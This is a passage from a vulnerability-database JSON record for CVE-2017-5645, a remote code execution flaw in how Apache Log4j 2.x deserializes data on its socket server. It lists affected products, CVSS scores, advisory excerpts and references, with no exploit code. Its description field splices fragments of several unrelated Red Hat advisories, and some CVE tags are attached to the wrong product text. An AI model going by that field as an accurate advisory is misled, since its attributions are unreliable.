0.3, vendor: "oracle", version: "7.3", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0.1.1.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "communications interactive session recorder", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2", }, { model: "communications interactive session recorder", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1", }, { model: "communications interactive session recorder", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications convergent charging controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "communications converged application server service controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "-6.1", }, { model: "communications brm elastic charging engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "-7.5", }, { model: "business intelligence data warehouse administration console", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.6.4", }, { model: "big data discovery", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.6", }, { model: "autovue for agile product lifecycle management", scope: "eq", trust: 0.3, vendor: "oracle", version: "21.0.1", }, { model: "autovue for agile product lifecycle management", scope: "eq", trust: 0.3, vendor: "oracle", version: "21.0", }, { model: "application testing suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2.0.1", }, { model: "application testing suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.1", }, { model: "application testing suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.5.0.3", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.6", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.5", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.4", }, { model: "agile plm mcad connector", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.3", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.6", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile material and equipment management for pharmaceuticals", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile material and equipment management for pharmaceuticals", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.3", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.1", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.8.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.6.2", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.6.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0.2", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0.1", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.8", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.7", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.6", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.5", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.3", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.2", }, { model: "log4j", scope: "eq", trust: 0.3, vendor: "apache", version: "2.1", }, { model: "log4j 2.0-alpha1", scope: null, trust: 0.3, vendor: "apache", version: null, }, { model: "log4j rc2", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j rc1", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta9", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta8", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta7", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta6", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta5", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta4", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta3", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta2", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j beta1", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "log4j alpha2", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "communications webrtc session controller", scope: "ne", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications messaging server", scope: "ne", trust: 0.3, vendor: "oracle", version: "8.0.2", }, { model: "log4j", scope: "ne", trust: 0.3, vendor: "apache", version: "2.8.2", }, ], sources: [ { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:apache:log4j", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2017-003152", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat", sources: [ { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 0.8, }, cve: "CVE-2017-5645", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2017-5645", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.8, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-113848", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2017-5645", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, { attackComplexity: "Low", attackVector: "Network", author: "NVD", availabilityImpact: "High", baseScore: 9.8, baseSeverity: "Critical", confidentialityImpact: "High", exploitabilityScore: null, id: "CVE-2017-5645", impactScore: null, integrityImpact: "High", privilegesRequired: "None", scope: "Unchanged", trust: 0.8, userInteraction: "None", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2017-5645", trust: 1, value: "CRITICAL", }, { author: "NVD", id: "CVE-2017-5645", trust: 0.8, value: "Critical", }, { author: "VULHUB", id: "VHN-113848", trust: 0.1, value: "HIGH", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j Contains a vulnerability in the deserialization of unreliable data.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Apache Log4j is prone to remote code-execution vulnerability. \nSuccessfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application. Failed exploits will result in denial-of-service conditions. \nApache Log4j 2.0-alpha1 through 2.8.1 are vulnerable. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 1 serves as a\nreplacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which\nare documented in the Release Notes document linked to in the References. (CVE-2017-5645)\n\n* A vulnerability was discovered in tomcat's handling of pipelined requests\nwhen \"Sendfile\" was used. If sendfile processing completed quickly, it was\npossible for the Processor to be added to the processor cache twice. This\ncould lead to invalid responses or information disclosure. (CVE-2017-5647)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat's\nDefaultServlet implementation. A crafted HTTP request could cause undesired\nside effects, possibly including the removal or replacement of the custom\nerror page. (CVE-2017-5664)\n\n* A vulnerability was discovered in tomcat. When running an untrusted\napplication under a SecurityManager it was possible, under some\ncircumstances, for that application to retain references to the request or\nresponse objects and thereby access and/or modify information associated\nwith another web application. (CVE-2017-5648)\n\n4. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):\n\n1441205 - CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used\n1441223 - CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1459158 - CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJWS-657 - tomcat-native installs RHEL apr in addition to jbcs-httpd24-httpd-libs\nJWS-667 - Subject incorrectly removed from user session\nJWS-695 - tomcat7_t and tomcat8_t domains are in unconfined_domain\nJWS-709 - RPM missing selinux-policy dependency\nJWS-716 - Backport 60087 for Tomcat 8\nJWS-717 - RFC 7230/3986 url requirement that prevents unencoded curly braces should be optional, since it breaks existing sites\nJWS-721 - CORS filter Vary header missing\nJWS-725 - /usr/share/tomcat7 needs world execute permissions to function on openshift v2\nJWS-741 - Configurations in conf.d are not applied\nJWS-760 - [ASF BZ 59961] Provide an option to enable/disable processing of Class-Path entry in a jar's manifest file\n\n7. The purpose of this text-only errata is to inform you about the\nsecurity issues fixed in this release. \n\nSecurity Fix(es):\n\n* bsh2: remote code execution via deserialization (CVE-2016-2510)\n\n* log4j: Socket receiver deserialization vulnerability (CVE-2017-5645)\n\n* uima: XML external entity expansion (XXE) can allow attackers to execute\narbitrary code (CVE-2017-15691)\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n\n* thrift: Improper Access Control grants access to files outside the\nwebservers docroot path (CVE-2018-11798)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nInstallation instructions are available from the Fuse 7.3.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1310647 - CVE-2016-2510 bsh2: remote code execution via deserialization\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1572463 - CVE-2017-15691 uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1667188 - CVE-2018-11798 thrift: Improper Access Control grants access to files outside the webservers docroot path\n\n5. Description:\n\nRed Hat JBoss BPM Suite is a business rules and processes management system\nfor the management, storage, creation, modification, and deployment of\nJBoss rules and BPMN2-compliant business processes. (CVE-2017-5645)\n\n* It was found that XStream contains a vulnerability that allows a\nmaliciously crafted file to be parsed successfully which could cause an\napplication crash. The crash occurs if the file that is being fed into\nXStream input stream contains an instances of the primitive type 'void'. An\nattacker could use this flaw to create a denial of service on the target\nsystem. (CVE-2017-7957)\n\n3. \n\nIt is recommended to halt the server by stopping the JBoss Application\nServer process before installing this update; after installing the update,\nrestart the server by starting the JBoss Application Server process. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: log4j security update\nAdvisory ID: RHSA-2017:2423-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:2423\nIssue date: 2017-08-07\nCVE Names: CVE-2017-5645 \n=====================================================================\n\n1. Summary:\n\nAn update for log4j is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch\nRed Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch\nRed Hat Enterprise Linux Workstation (v. 7) - noarch\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch\n\n3. Description:\n\nLog4j is a tool to help the programmer output log statements to a variety\nof output targets. (CVE-2017-5645)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nlog4j-1.2.17-16.el7_4.src.rpm\n\nnoarch:\nlog4j-1.2.17-16.el7_4.noarch.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nlog4j-javadoc-1.2.17-16.el7_4.noarch.rpm\nlog4j-manual-1.2.17-16.el7_4.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-5645\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZiCjVXlSAg2UNWIIRAgugAKCX6snTYMAdTmkK1uQ86MGQhkv7ugCdFILV\nuCPrjfU5EG2L7kIu/w1uCSA=\n=Fxz+\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThe eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss\nEnterprise Application Platform running on the Amazon Web Services (AWS)\nElastic Compute Cloud (EC2). (CVE-2017-5645)\n\n* A vulnerability was found in Jasypt that would allow an attacker to\nperform a timing attack on password hash comparison. (CVE-2014-9970)\n\n* It was found that an information disclosure flaw in Bouncy Castle could\nenable a local malicious application to gain access to user's private\ninformation. (CVE-2015-6644)\n\n* It was found that while parsing the SAML messages the StaxParserUtil\nclass of Picketlink replaces special strings for obtaining attribute values\nwith system property. This could allow an attacker to determine values of\nsystem properties at the attacked system by formatting the SAML request ID\nfield to be the chosen system property which could be obtained in the\n\"InResponseTo\" field in the response. (CVE-2017-2582)\n\n* It was found that when the security manager's reflective permissions,\nwhich allows it to access the private members of the class, are granted to\nHibernate Validator, a potential privilege escalation can occur. By\nallowing the calling code to access those private members without the\npermission an attacker may be able to validate an invalid instance and\naccess the private member value via ConstraintViolation#getInvalidValue(). JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-11487 - jboss-ec2-eap for EAP 7.0.8\n\n7. \n(CVE-2017-7525)\n\nRed Hat would like to thank Liao Xinxi (NSFOCUS) for reporting\nCVE-2017-7525", sources: [ { db: "NVD", id: "CVE-2017-5645", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "BID", id: "97702", }, { db: "VULHUB", id: "VHN-113848", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 2.7, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2017-5645", trust: 3, }, { db: "BID", id: "97702", trust: 1.4, }, { db: "OPENWALL", id: "OSS-SECURITY/2019/12/19/2", trust: 1.1, }, { db: "SECTRACK", id: "1041294", trust: 1.1, }, { db: "SECTRACK", id: "1040200", trust: 1.1, }, { db: "JVNDB", id: "JVNDB-2017-003152", trust: 0.8, }, { db: "PACKETSTORM", id: "144018", trust: 0.2, }, { db: "PACKETSTORM", id: "144013", trust: 0.2, }, { db: "PACKETSTORM", id: "143670", trust: 0.2, }, { db: "PACKETSTORM", id: "144597", trust: 0.2, }, { db: "PACKETSTORM", id: "143499", trust: 0.2, }, { db: "PACKETSTORM", id: "144019", trust: 0.2, }, { db: "PACKETSTORM", id: "145263", trust: 0.1, }, { db: "PACKETSTORM", id: "143500", trust: 0.1, }, { db: "PACKETSTORM", id: "144014", trust: 0.1, }, { db: "PACKETSTORM", id: "144017", trust: 0.1, }, { db: "PACKETSTORM", id: "144596", trust: 0.1, }, { db: "PACKETSTORM", id: "145262", trust: 0.1, }, { db: "PACKETSTORM", id: "142856", trust: 0.1, }, { db: "CNNVD", id: "CNNVD-201704-852", trust: 0.1, }, { db: "SEEBUG", id: "SSVID-92965", trust: 0.1, }, { db: "VULHUB", id: "VHN-113848", trust: 0.1, }, { db: "PACKETSTORM", id: "153344", trust: 0.1, }, { db: "PACKETSTORM", id: "144359", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, id: "VAR-201704-1589", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-113848", }, ], trust: 0.01, }, last_update_date: "2024-11-29T21:55:35.270000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "LOG4J2-1863", trust: 0.8, url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, ], sources: [ { db: "JVNDB", id: "JVNDB-2017-003152", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-502", trust: 1.9, }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 1.6, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5645", }, { trust: 1.4, url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { trust: 1.4, url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { trust: 1.4, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { trust: 1.4, url: "https://issues.apache.org/jira/browse/log4j2-1863", }, { trust: 1.4, url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { trust: 1.4, url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { trust: 1.4, url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:1801", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2423", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2633", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2637", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2638", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2811", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2017:2889", }, { trust: 1.2, url: "https://access.redhat.com/errata/rhsa-2019:1545", }, { trust: 1.1, url: "http://www.securityfocus.com/bid/97702", }, { trust: 1.1, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { trust: 1.1, url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { trust: 1.1, url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuapr2021.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 1.1, url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { trust: 1.1, url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { trust: 1.1, url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:1417", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:1802", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2635", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2636", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2808", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2809", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2810", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:2888", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:3244", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:3399", }, { trust: 1.1, url: "https://access.redhat.com/errata/rhsa-2017:3400", }, { trust: 1.1, url: "http://www.securitytracker.com/id/1040200", }, { trust: 1.1, url: "http://www.securitytracker.com/id/1041294", }, { trust: 1.1, url: "https://access.redhat.com/security/cve/cve-2017-5645", }, { trust: 1, url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3cdev.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3cissues.bookkeeper.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3cissues.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3ccommits.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3ccommits.doris.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3cissues.geode.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: 